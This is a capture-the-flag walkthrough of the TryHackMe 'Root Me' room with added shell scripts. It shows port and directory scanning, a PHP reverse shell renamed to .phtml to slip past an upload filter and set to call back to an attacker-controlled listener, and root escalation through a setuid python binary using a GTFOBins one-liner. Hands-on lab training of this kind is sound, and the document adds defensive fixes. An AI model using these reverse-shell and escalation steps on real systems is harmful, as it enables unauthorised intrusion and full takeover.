Try Hack Me Writeup (Root Me)

Hi, before I jump into the writeup, a disclaimer: my machine IP changes between screenshots because I did the tasks first and then took these shots by starting the machine several times, just for the purpose of writing this writeup.

Task 1 (Deploy the machine):

This is a very easy task: connect your VM to the TryHackMe VPN and click Start Machine.

Task 2(Reconnaissance):

From here the actual activity begins. Once you have the machine IP, scan it for open ports with Nmap, which is built into Kali Linux. Open a terminal and run: nmap -Pn (machine IP). The -Pn flag skips host discovery, so the scan runs even if the target does not answer ping.

The output lists every open port and the service Nmap associates with it.

Next, run the second command: nmap -sV (machine IP)

The -sV flag probes each open port and reports the version of the service running on it; those versions answer the task's questions and are what you would search for known vulnerabilities against.

Now find the hidden directories on the web server. This needs gobuster; installing it is out of scope here. With gobuster available, run: gobuster dir -u http://(machine IP) -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt. This brute-forces directory names from the wordlist, so be patient; it can take a while.
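The two scans above produce a report you read by eye; the following script is an added example (not from the original writeup) that parses an nmap -sV report into open port/service/version lines, picks out the HTTP ports, and builds the gobuster command for each of them. The nmap report embedded below is a constructed sample written to resemble what the scan prints for this room, not a captured scan, and 10.10.10.10 is a placeholder for the machine IP.

```shell
#!/bin/sh
# Added example: triage nmap -sV output and turn the web ports into gobuster jobs.
# Real usage: nmap -sV -oN nmap.txt <machine IP>; then: open_ports < nmap.txt

# Constructed sample of an `nmap -sV` normal-output report (not a real scan).
SAMPLE_NMAP='Starting Nmap 7.93 ( https://nmap.org )
Nmap scan report for 10.10.10.10
Host is up (0.050s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel'

# open_ports: read an nmap report on stdin and print one line per open port:
# "port/proto service version". Lines that are not port rows are ignored.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        port = $1; svc = $3
        $1 = $2 = $3 = ""; sub(/^ +/, "")      # what is left is the version text
        print port, svc, $0
    }'
}

# http_ports: from the same report, print only the port numbers whose service
# is http or https; these are the ones worth pointing gobuster at.
http_ports() {
    open_ports | awk '$2 ~ /^https?$/ { sub(/\/.*/, "", $1); print $1 }'
}

# gobuster_cmd HOST PORT: build the directory brute-force command line.
# -x also tries the listed extensions, which matters on a PHP upload site.
gobuster_cmd() {
    printf 'gobuster dir -u http://%s:%s -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x php,phtml,txt\n' "$1" "$2"
}

# Demo on the constructed report.
printf '%s\n' "$SAMPLE_NMAP" | open_ports
for p in $(printf '%s\n' "$SAMPLE_NMAP" | http_ports); do
    gobuster_cmd 10.10.10.10 "$p"
done
```

Save the real scan with nmap -oN and pipe that file into open_ports; the gobuster line it prints is the one to run against the room.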

This tells us about all the hidden directories on the server. With that, every question in this task can be answered, so fill in the answers.

Task 2 is now complete.



Task 3(Getting the Shell):

Open the directory that gobuster found in the browser.

This upload page opens.

The hint says to use a PHP reverse shell, so try uploading one. Kali already ships the pentestmonkey reverse shell at /usr/share/webshells/php/php-reverse-shell.php; take that file and try to upload it.

It is not accepted: the upload filter rejects the .php extension. Try another extension that the web server still treats as PHP, so rename the file to end in .phtml. The filter only looks at the file name, and the PHP module configuration on Debian/Ubuntu Apache hands .phtml files to the PHP interpreter, which is why the rename alone is enough.

Before uploading, open the file with gedit and replace the IP in the $ip line with your VPN IP (the tun0 address), and make sure $port matches the port you are going to listen on.

Upload the renamed file; this time it succeeds.

Open a new terminal and run nc -lnvp 1234, which listens on port 1234. Then browse to the /uploads directory and click the uploaded file. As the server executes it, the shell connects back to your listener on port 1234.

The connection is established, but it is not a proper TTY, so upgrade it with: python -c 'import pty; pty.spawn("/bin/bash")'

WE ARE IN NOW I REPEAT WE ARE IN ; )

Now navigate through the directories; user.txt holds the flag. Task 3 is complete.
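The upload steps above (patch the callback address, rename to .phtml, upload, catch the shell) can be scripted. The following is an added example, not the writeup's own code: it rewrites the $ip and $port lines of the pentestmonkey template, writes the result under a .phtml name, and models the room's weak deny-list so you can see why the rename slips past it. The template below is a constructed cut-down stand-in for /usr/share/webshells/php/php-reverse-shell.php (only the two "CHANGE THIS" lines match the real file), the address 10.8.0.2 is a placeholder for your VPN IP, and upload_allowed is a model of the observed behaviour, not the room's real server code.

```shell
#!/bin/sh
# Added example: stage the PHP reverse shell for an upload filter that only
# blocks the ".php" extension. Not part of the original writeup.

WORK="${TMPDIR:-/tmp}/rootme-shell.$$"
mkdir -p "$WORK"
trap 'rm -rf "$WORK"' EXIT

# Constructed stand-in for the Kali template; only the $ip/$port lines are real.
cat > "$WORK/php-reverse-shell.php" <<'EOF'
<?php
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
// ... rest of pentestmonkey's shell omitted in this stand-in ...
EOF

# prepare_shell TEMPLATE LHOST LPORT OUT: copy TEMPLATE to OUT with the
# callback target rewritten. OUT should carry an extension the server still
# hands to the PHP handler (.phtml here) but the upload filter does not block.
prepare_shell() {
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '$2';/" \
        -e "s/^[\$]port = [0-9][0-9]*;/\$port = $3;/" "$1" > "$4"
}

# upload_allowed NAME: model of a deny-list that refuses only ".php".
# Returns 0 when the name would be accepted. Mirrors what the writeup saw
# (shell.php rejected, shell.phtml accepted); it is not the room's code.
upload_allowed() {
    case "$1" in
        *.php) return 1 ;;
        *)     return 0 ;;
    esac
}

# callback_target FILE: print "ip port" as configured in a prepared shell,
# so you can confirm it matches the listener before uploading.
callback_target() {
    awk -F"'" '/^[$]ip = /{ip=$2}
               /^[$]port = /{split($0, a, /[ ;]+/); port=a[3]}
               END{print ip, port}' "$1"
}

# Demo: patch the template (placeholder VPN address) and test both names.
prepare_shell "$WORK/php-reverse-shell.php" 10.8.0.2 1234 "$WORK/shell.phtml"
for f in shell.php shell.phtml; do
    if upload_allowed "$f"; then echo "$f: accepted"; else echo "$f: rejected by filter"; fi
done
echo "shell.phtml will call back to: $(callback_target "$WORK/shell.phtml")"

# Then, on your machine:   nc -lnvp 1234
# browse to http://<machine IP>/uploads/shell.phtml, and once connected:
#   python -c 'import pty; pty.spawn("/bin/bash")'
```

The lesson is that a name-based deny-list is the wrong control: the server should allow-list the extensions it expects (images, documents), store uploads outside the PHP handler's reach, and never serve the upload directory with script execution enabled.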



Task 4(Privilege Escalation):

Open the hint for the first question and run this in the shell: find / -user root -perm /4000 2>/dev/null. It lists every file owned by root with the setuid bit set (the 2>/dev/null discards errors from directories you cannot read). Compare the output against the flag format and look for anything that should not be setuid: a python binary shows up here, and that is the suspicious one.

That is the correct flag.

Now, to gain root privileges, run the setuid python like this: python -c 'import os; os.execl("/bin/sh", "sh", "-p")'. You can find this command on GTFOBins under the SUID entry for python. The -p flag tells sh to keep the effective (root) UID instead of dropping back to your real UID.

You are root now.

cat the root.txt file and you will get the flag.
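Reading the find output by eye works on a small box; the following is an added example (not from the original writeup) that subtracts a baseline of the setuid binaries a stock Ubuntu install ships, so the odd one stands on its own line, and prints the GTFOBins one-liner for a setuid python. The find output below is a constructed sample of what the command prints on this room's machine, not a captured listing, and the baseline is a hand-maintained list to be tuned for the distribution you are looking at, not an authoritative catalogue.

```shell
#!/bin/sh
# Added example: triage `find / -user root -perm /4000 2>/dev/null` output
# against a baseline of expected setuid-root binaries. Not part of the writeup.

# Constructed sample of the find output (paths only).
SAMPLE_FIND='/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/python
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/bin/ping
/bin/mount
/bin/umount
/bin/su'

# Setuid-root binaries expected on a stock Ubuntu install (assumption: adjust
# for the target distribution; anything not listed here gets flagged).
BASELINE='/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chfn
/bin/ping
/bin/mount
/bin/umount
/bin/su'

# suid_suspects: read find output on stdin, print the paths not in BASELINE.
suid_suspects() {
    base="${TMPDIR:-/tmp}/suid-baseline.$$"
    printf '%s\n' "$BASELINE" | sort > "$base"
    sort | comm -23 - "$base"        # lines only in the find output
    rm -f "$base"
}

# escalate_cmd BIN: the GTFOBins SUID one-liner for a setuid python binary.
# "sh -p" keeps the effective UID (root) instead of dropping to the real one.
escalate_cmd() {
    printf '%s -c '"'"'import os; os.execl("/bin/sh", "sh", "-p")'"'"'\n' "$1"
}

# Demo on the constructed listing. Real usage:
#   find / -user root -perm /4000 2>/dev/null | suid_suspects
printf '%s\n' "$SAMPLE_FIND" | suid_suspects | while read -r bin; do
    echo "unexpected setuid binary: $bin"
    case "$bin" in
        */python*) echo "try: $(escalate_cmd "$bin")" ;;
    esac
done
```

Only the python entry survives the subtraction, which is the same conclusion the task reaches by hand. For a defender the fix is the mirror image: a setuid bit on an interpreter hands root to anyone who can run it, so strip it (chmod u-s) and audit how it got there.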


Disclaimer: these images are added in sequential order; if you still have any concerns, see the original blog at: https://medium.com/@i221666/thm-rootme-challenge-writeup-33b2f88d1af1 or contact me.
